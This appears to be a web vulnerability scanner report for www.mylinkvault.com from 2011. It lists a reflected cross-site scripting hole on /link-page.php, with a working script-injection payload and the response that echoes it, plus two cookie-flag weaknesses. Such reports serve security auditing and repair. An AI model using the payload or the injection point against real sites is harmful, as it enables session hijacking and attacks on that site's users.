1. Cross-site scripting (reflected)
2. Cookie scoped to parent domain
3. Cookie without HttpOnly flag set
| Severity: | High | 
| Confidence: | Certain | 
| Host: | http://www.mylinkvault | 
| Path: | /link-page.php | 
| GET /link-page.php?1fe9b"><script>alert(1)< Host: www.mylinkvault.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close | 
| HTTP/1.1 200 OK Date: Sun, 17 Apr 2011 14:14:38 GMT Server: Apache X-Powered-By: PHP/5.2.15 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Language: en Set-Cookie: PHPSESSID=vp85qklqj1 Vary: Accept-Encoding Content-Length: 4249 Connection: close Content-Type: text/html; charset=utf-8 <!DOCTYPE php PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <tit ...[SNIP]... <input type="hidden" name="login_referer" value="/link-page.php?1fe9b"><script>alert(1)< ...[SNIP]... | 
| Severity: | Low | 
| Confidence: | Firm | 
| Host: | http://www.mylinkvault | 
| Path: | /link-page.php | 
| GET /link-page.php HTTP/1.1 Host: www.mylinkvault.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close | 
| HTTP/1.1 302 Moved Temporarily Date: Sun, 17 Apr 2011 14:14:33 GMT Server: Apache X-Powered-By: PHP/5.2.15 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=4r542aakmq Location: /users/?url=%2Flink-page Vary: Accept-Encoding Content-Length: 0 Connection: close Content-Type: text/html | 
| Severity: | Low | 
| Confidence: | Firm | 
| Host: | http://www.mylinkvault | 
| Path: | /link-page.php | 
| GET /link-page.php HTTP/1.1 Host: www.mylinkvault.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close | 
| HTTP/1.1 302 Moved Temporarily Date: Sun, 17 Apr 2011 14:14:33 GMT Server: Apache X-Powered-By: PHP/5.2.15 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=4r542aakmq Location: /users/?url=%2Flink-page Vary: Accept-Encoding Content-Length: 0 Connection: close Content-Type: text/html |